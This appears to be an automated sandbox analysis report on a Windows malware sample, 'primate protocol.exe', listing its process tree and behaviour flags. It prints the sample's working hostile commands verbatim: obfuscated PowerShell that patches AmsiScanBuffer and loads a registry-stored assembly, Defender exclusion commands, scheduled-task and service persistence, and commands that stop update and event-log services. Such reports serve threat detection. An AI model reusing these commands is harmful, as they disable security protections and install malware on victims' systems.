Suspicious use of FindShellTrayWindow 33 IoCs
pid Process
3556 Explorer.EXE (×2)
2016 chrome.exe (×26)
6000 msedge.exe (×2)
2016 chrome.exe
3556 Explorer.EXE (×2)
Suspicious use of SendNotifyMessage 64 IoCs
pid Process
3556 Explorer.EXE (×10)
2016 chrome.exe (×3)
3556 Explorer.EXE
2016 chrome.exe (×13)
3556 Explorer.EXE (×8)
2016 chrome.exe (×8)
3556 Explorer.EXE (×21)
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process
3880 systemprocess.exe
4064 OpenWith.exe
Suspicious use of UnmapMainImage 1 IoCs
pid Process
3556 Explorer.EXE
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target
PID 2492 wrote to memory of 4440 2492 primate protocol.exe 88 (×3)
PID 2492 wrote to memory of 2336 2492 primate protocol.exe 89 (×3)
PID 2492 wrote to memory of 3880 2492 primate protocol.exe 92 (×2)
PID 2492 wrote to memory of 5948 2492 primate protocol.exe 93 (×2)
PID 2492 wrote to memory of 1060 2492 primate protocol.exe 94 (×2)
PID 3880 wrote to memory of 4756 3880 systemprocess.exe 95 (×2)
PID 1060 wrote to memory of 4760 1060 CompPkg.exe 97 (×2)
PID 1928 wrote to memory of 4904 1928 cmd.exe 101 (×2)
PID 3880 wrote to memory of 4036 3880 systemprocess.exe 104 (×2)
PID 3880 wrote to memory of 2592 3880 systemprocess.exe 106 (×2)
PID 5948 wrote to memory of 704 5948 host.exe 118 (×6)
PID 1632 wrote to memory of 4492 1632 ijujdfuujtjk.exe 140 (×6)
PID 1632 wrote to memory of 6036 1632 ijujdfuujtjk.exe 141 (×9)
PID 1632 wrote to memory of 4832 1632 ijujdfuujtjk.exe 142 (×5)
PID 4480 wrote to memory of 3148 4480 powershell.EXE 145 (×8)
PID 3148 wrote to memory of 616 3148 dllhost.exe 5
PID 3148 wrote to memory of 672 3148 dllhost.exe 7
PID 3148 wrote to memory of 960 3148 dllhost.exe 12
PID 3148 wrote to memory of 336 3148 dllhost.exe 13
PID 3148 wrote to memory of 408 3148 dllhost.exe 14
PID 3148 wrote to memory of 1044 3148 dllhost.exe 15
PID 3148 wrote to memory of 1072 3148 dllhost.exe 17
PID 3148 wrote to memory of 1080 3148 dllhost.exe 18
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (image path | command line | PID; indentation shows parent/child nesting)
C:\Windows\system32\winlogon.exe | winlogon.exe | PID:616
  C:\Windows\system32\dwm.exe | "dwm.exe" | PID:336
  C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{3dc28f87-b8e3-4dfa-a166-a006b4a498ba} | PID:3148
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{ec80ab00-b363-4b21-bbe8-85111939d665} | PID:4500
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe | PID:672
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM | PID:960
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | PID:408
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService | PID:1044
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts | PID:1072
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc | PID:1080
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | PID:1204
  - Drops file in System32 directory
  C:\Windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} | PID:3028
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OdjsqXVEoMxo{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yfmVlGOStjgHBO,[Parameter(Position=1)][Type]$UJRGIblVoq)$hIprbDofzkL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+'g'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+'r'+''+[Char](121)+''+'M'+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+''+'s'+','+'P'+''+[Char](117)+'b'+'l'+'i'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$hIprbDofzkL.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+'e'+[Char](99)+''+'i'+'a'+[Char](108)+'N'+'a'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yfmVlGOStjgHBO).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+'n'+'a'+'g'+[Char](101)+''+[Char](100)+'');$hIprbDofzkL.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''
+[Char](111)+''+[Char](107)+''+'e'+'','P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+'lo'+'t'+''+','+''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$UJRGIblVoq,$yfmVlGOStjgHBO).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+','+[Char](77)+'a'+'n'+''+'a'+'g'+'e'+''+'d'+'');Write-Output $hIprbDofzkL.CreateType();}$vyVsTzFyMRkLJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'yst'+[Char](101)+''+[Char](109)+'.dl'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+'a'+''+'f'+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+'h'+[Char](111)+''+[Char](100)+''+'s'+'');$bYPnAmzEfuscSx=$vyVsTzFyMRkLJ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c'+','+''+'S'+'t'+'a'+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZDRpFjDocdPWEvpSmDG=OdjsqXVEoMxo @([String])([IntPtr]);$nfWTHpcRSoEqqeFdfiOtpn=OdjsqXVEoMxo 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wEXXhkFtbyb=$vyVsTzFyMRkLJ.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+'3'+'2.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$oleLiZxwkOLAwO=$bYPnAmzEfuscSx.Invoke($Null,@([Object]$wEXXhkFtbyb,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+[Char](76)+'ib'+'r'+''+'a'+''+[Char](114)+''+'y'+''+'A'+'')));$PiJGUFQYEknHQZPKx=$bYPnAmzEfuscSx.Invoke($Null,@([Object]$wEXXhkFtbyb,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$HEIoPYX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oleLiZxwkOLAwO,$ZDRpFjDocdPWEvpSmDG).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$uXiOiPrfOfLHHnfYI=$bYPnAmzEfuscSx.Invoke($Null,@([Object]$HEIoPYX,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+'S'+[Char](99)+''+'a'+'nB'+[Char](117)+''+[Char](102)+''+[Char](102)+'er')));$zhrGrazrmt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PiJGUFQYEknHQZPKx,$nfWTHpcRSoEqqeFdfiOtpn).Invoke($uXiOiPrfOfLHHnfYI,[uint32]8,4,[ref]$zhrGrazrmt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uXiOiPrfOfLHHnfYI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PiJGUFQYEknHQZPKx,$nfWTHpcRSoEqqeFdfiOtpn).Invoke($uXiOiPrfOfLHHnfYI,[uint32]8,0x20,[ref]$zhrGrazrmt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+[Char](108)+'e'+[Char](114)+''+[Char](115)+''+'t'+''+[Char](97)+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,
$Null)"2⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4480
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:hUtTGcpIBRWx{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cuszbhKDZHUugU,[Parameter(Position=1)][Type]$TzthIiuPXy)$BpDXKpeuMBK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+''+'m'+''+'o'+'ry'+[Char](77)+''+'o'+''+[Char](100)+'ul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+','+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+'e'+'a'+'l'+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+','+'A'+''+[Char](117)+''+'t'+''+'o'+''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$BpDXKpeuMBK.DefineConstructor(''+'R'+'T'+'S'+'p'+[Char](101)+'c'+[Char](105)+''+[Char](97)+'lN'+[Char](97)+'m'+'e'+','+'H'+'i'+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+'ig,'+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$cuszbhKDZHUugU).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+'e'+','+'Man'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$BpDXKpeuMBK.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'','P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c,'+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char
](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$TzthIiuPXy,$cuszbhKDZHUugU).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $BpDXKpeuMBK.CreateType();}$AeIOUWqdeFhrt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+'e'+'m'+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+[Char](111)+'ft'+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+'s'+[Char](97)+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+'ve'+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+'s'+'');$iTlDFUyQFnghAn=$AeIOUWqdeFhrt.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'i'+'c'+','+[Char](83)+''+'t'+'a'+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZlMhhgPuJPEJZMiKYVc=hUtTGcpIBRWx @([String])([IntPtr]);$DGoBTzKEyyvelOULPFuXKR=hUtTGcpIBRWx 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$erEVRAlXqJK=$AeIOUWqdeFhrt.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+'e'+''+[Char](72)+''+'a'+''+[Char](110)+''+'d'+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+'e'+'l'+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+'l'+'l'+'')));$OkQLxsSoUiELgP=$iTlDFUyQFnghAn.Invoke($Null,@([Object]$erEVRAlXqJK,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$JRRmeUNoqiZyPvdtP=$iTlDFUyQFnghAn.Invoke($Null,@([Object]$erEVRAlXqJK,[Object](''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+'r'+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$eycvYqX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OkQLxsSoUiELgP,$ZlMhhgPuJPEJZMiKYVc).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$dBFykBqhboaywzxVD=$iTlDFUyQFnghAn.Invoke($Null,@([Object]$eycvYqX,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+'S'+[Char](99)+''+[Char](97)+'nB'+'u'+''+[Char](102)+'fe'+'r'+'')));$aYFVrPYVCg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JRRmeUNoqiZyPvdtP,$DGoBTzKEyyvelOULPFuXKR).Invoke($dBFykBqhboaywzxVD,[uint32]8,4,[ref]$aYFVrPYVCg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$dBFykBqhboaywzxVD,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JRRmeUNoqiZyPvdtP,$DGoBTzKEyyvelOULPFuXKR).Invoke($dBFykBqhboaywzxVD,[uint32]8,0x20,[ref]$aYFVrPYVCg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'r'+[Char](115)+'t'+[Char](97)+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Nul
l)"2⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5052
  C:\Users\Admin\AppData\Roaming\CompPkg.exe | C:\Users\Admin\AppData\Roaming\CompPkg.exe | PID:3096
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\CompPkg.exe | C:\Users\Admin\AppData\Roaming\CompPkg.exe | PID:5876
    - Executes dropped EXE
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | PID:1252
  - Indicator Removal: Clear Windows Event Logs
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | PID:1296
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc | PID:1356
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | PID:1396
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | PID:1476
  C:\Windows\system32\sihost.exe | sihost.exe | PID:2796
    - Modifies registry class
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | PID:1484
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | PID:1504
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | PID:1564
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | PID:1664
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc | PID:1704
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | PID:1712
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | PID:1832
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm | PID:1860
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository | PID:1952
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | PID:1988
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache | PID:1996
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | PID:1772
C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe | PID:2116
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | PID:2168
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | PID:2256
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc | PID:2280
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | PID:2460
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | PID:2468
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc | PID:2620
  - Drops file in System32 directory
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | PID:2652
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\sysmon.exe | C:\Windows\sysmon.exe | PID:2684
C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | PID:2728
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | PID:2736
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | PID:2804
C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding | PID:2680
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker | PID:3124
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | PID:3468
C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | PID:3556
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of UnmapMainImage
  C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | "C:\Users\Admin\AppData\Local\Temp\primate protocol.exe" | PID:2492
    - Checks computer location settings
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAZQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASABFAEEARABTAEUAVAAgAE4ATwBUACAARABFAFQARQBDAFQARQBEACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBuAGYAZwAjAD4A" | PID:4440
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | PID:5220
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAawBmACMAPgA=" | PID:2336
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\systemprocess.exe | "C:\Windows\systemprocess.exe" | PID:3880
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious behavior: AddClipboardFormatListener
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      C:\Windows\SYSTEM32\schtasks.exe | "schtasks" /create /tn "HOST" /sc ONLOGON /tr "C:\Windows\systemprocess.exe" /rl HIGHEST /f | PID:4756
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\SYSTEM32\netsh.exe | "netsh" wlan show profiles | PID:4036
        - Event Triggered Execution: Netsh Helper DLL
        - System Network Configuration Discovery: Wi-Fi Discovery
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "$([System.Environment]::GetEnvironmentVariable('SystemDrive'))\" | PID:2592
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SYSTEM32\schtasks.exe | "schtasks" /delete /tn "HOST" /f | PID:5064
      C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KrCtYfhVKMt4.bat" " | PID:1512
        C:\Windows\system32\chcp.com | chcp 65001 | PID:3012
        C:\Windows\system32\timeout.exe | timeout /T 5 /NOBREAK | PID:832
          - Delays execution with timeout.exe
    C:\Windows\host.exe | "C:\Windows\host.exe" | PID:5948
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop UsoSvc | PID:2008
        - Launches sc.exe
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop WaaSMedicSvc | PID:4092
        - Launches sc.exe
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop wuauserv | PID:1240
        - Launches sc.exe
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop bits | PID:1800
        - Launches sc.exe
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop dosvc | PID:1524
        - Launches sc.exe
      C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe | PID:704
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe delete "PROCESS HOST" | PID:4056
        - Launches sc.exe
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe create "PROCESS HOST" binpath= "C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe" start= "auto" | PID:3532
        - Launches sc.exe
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop eventlog | PID:2580
        - Launches sc.exe
      C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe start "PROCESS HOST" | PID:1100
        - Launches sc.exe
    C:\Windows\CompPkg.exe | "C:\Windows\CompPkg.exe" | PID:1060
      - Checks computer location settings
      - Drops startup file
      - Executes dropped EXE
      - Adds Run key to start application
      - Sets desktop wallpaper using registry
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
